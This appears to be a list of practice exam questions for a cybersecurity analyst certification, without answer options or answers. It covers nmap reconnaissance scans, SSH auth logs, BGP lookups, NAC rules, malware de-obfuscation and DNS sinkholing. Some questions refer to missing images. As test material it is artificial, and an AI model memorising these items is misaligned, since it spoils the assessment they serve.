Angela wants to gather detailed information about the hosts on a network passively. If she has access to a Wireshark pcap file from the network, which of the following tools can she use to provide automated analysis of the file?
Rick’s security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?
While performing reconnaissance of an organization’s network, Angela discovers that web.organization.com, www.organization.com, and documents.organization.com all point to the same host. What type of DNS record allows this?
Susan wants to prevent attackers from running specific files and also wants to lock down other parts of the Windows operating system to limit the impact of attackers who have access to workstations she is responsible for. If she wants to do this on Windows 10 workstations, what tool should she use?
While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred?
Chris operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI-DSS. During his regular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris’s best option to stay compliant with PCI-DSS and protect his vulnerable systems?
Senior management in Adam’s company recently read a number of articles about massive ransomware attacks that successfully targeted organizations like the one that Adam is a part of. Adam’s organization already uses layered security solutions including a border IPS, firewalls between network zones, local host firewalls, antivirus software, and a configuration management system that applies recommended operating system best practice settings to their workstations. What should Adam recommend to minimize the impact of a similar ransomware outbreak at his organization?
Which of the following tools is not typically associated with the reconnaissance phase of a penetration test?
What occurs when Alex uses the following command to perform an nmap scan of a network?
nmap -sP 192.168.2.0/24
As part of her malware analysis process, Kara builds a diagram of the components of the suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each subcomponent, adding it to her diagram. What is this process known as?
Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member during a penetration test. Which of the following types of attack is she least likely to be able to identify using a stateful packet inspection firewall?
Geoff’s remote scans of a target organization’s class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather additional reconnaissance information about the organization’s network, which of the following scanning techniques is most likely to provide additional detail?
During her normal daily review process, Jennifer detects an external system that is systematically conducting traceroute operations to each of the systems and devices in her network. What activity is most likely occurring?
Why does the U.S. government require Trusted Foundry and related requirements for technology?
As part of an externally accessible information review by their security team, Bob and Lisa receive the information that the security team gathered, including the following entry:
Query Results:
Router: Ashburn, VA - US
Command: show bgp ipv4 unicast 10.81.254.195
BGP routing table entry for 10.64.0.0/11
Versions:
Process bRIB/RIB SendTblVer
Speaker 287479994 287479994
Last Modified: Feb 22 09:16:16.154 for 8w0d
Paths: (13 available, best #13)
Advertised to update-groups (with more than one peer):
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45
Advertised to peers (in unique update groups):
10.250.31.182
Path #1: Received by speaker 0
Not advertised to any peer
7922
10.242.151.65 (metric 6710) from (129.250.0.162)
Origin IGP, metric 4294967294, localpref 98, valid, confed-internal
Received Path ID 0, Local Path ID 0, version 0
Community: 2914:390 2914:1006 2914:2000 2914:3000 65504:7922
Originator: 10.250.0.162, Cluster list: 10.250.0.9
....
Path #13: Received by speaker 0
Advertised to update-groups (with more than one peer):
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45
Advertised to peers (in unique update groups):
10.250.31.182
7922
What type of tool could they use to gather this publicly available information about their systems in the future?
A system that Jeff is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?
Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on his network. Which of the following practices will help to mitigate this risk?
Geoff wants to gather a list of all Windows services and their current state using a command-line tool. What tool can he use to gather this information for later processing?
While reviewing Shodan scan data for his organization, Adam finds the following information. What type of system has he discovered?
Use the following scenario and image to answer the following three questions:
While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the following information:
What issue should Amanda report to the system administrator?
What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
What command can Amanda use to terminate the process?
During Geoff’s configuration of his organization’s network access control policies, he sets up client OS rules that include the following statements:
ALLOW Windows 7 version *, Windows 10 version *
ALLOW OSX version *
ALLOW iOS 8.1, iOS 9 version *
ALLOW Android 7.*
After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?
Fred has been tasked with configuring his organization’s NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user’s job?
Charles is investigating a process that he believes may be malicious. What Linux command can he use to determine what files that process has open?
After a popular website is hacked, Chris begins to hear reports that email addresses from his company’s domain are listed in the hacker’s data dump. Chris knows that the list includes passwords and is concerned that his users may have used the same password for the site and their own company account. If the hackers recovered MD5 hashed passwords, how can he check them against the strong password hashes his company uses?
As part of his active reconnaissance activities, Frank is provided with a shell account accessible via ssh. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this?
Angela captured the following packets during a reconnaissance effort run by her organization’s red team. What type of information are they looking for?
Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering?
Geoff wants to prevent spammers from harvesting his organization’s public LDAP directory. What technology should he implement?
How can Saria remediate the issue shown here in the MBSA screenshot?
Greg configures his next-generation firewall security device to forge DNS responses for known malicious domains. As a result, users who attempt to visit sites hosted on those domains see a landing page that Greg controls, which advises them that they were prevented from visiting a malicious site. What is this technique known as?
While reviewing a malware sample, Adam discovers that code inside of it appears to be obfuscated. Which of the following encoding methods is commonly used to prevent code from being easily read by simply opening the file?
Jennifer is an Active Directory domain administrator for her company and knows that a quickly spreading botnet relies on a series of domain names for command and control and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command-and-control systems?
Charleen works for a U.S. government contractor that uses NIST’s definitions to describe threat categories. How should she categorize the threat posed by competitors that might seek to compromise her organization’s website?
Chris has been asked to assess the technical impact of suspected reconnaissance performed against his organization. He is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Chris categorize the technical impact of this type of reconnaissance?
Frank is creating the scope worksheet for his organization’s penetration test. Which of the following techniques is not typically included in a penetration test?
Allan needs to immediately shut down a service called Explorer.exe on a Windows server. Which of the following methods is not a viable option for him?
Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:11.0 11 924 1
2017-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11 924 1
Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?
Stacey encountered a system that shows as “filtered” and “firewalled” during an nmap scan. Which of the following techniques should she not consider as she is planning her next scan?
When Charleen attempts to visit a website, she receives a DNS response from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred?
Alex has been asked to implement network controls to ensure that users who authenticate to the network are physically in the building that the network they are authenticating to serves. What technology and tool should he use to do this?
As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called?
Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this?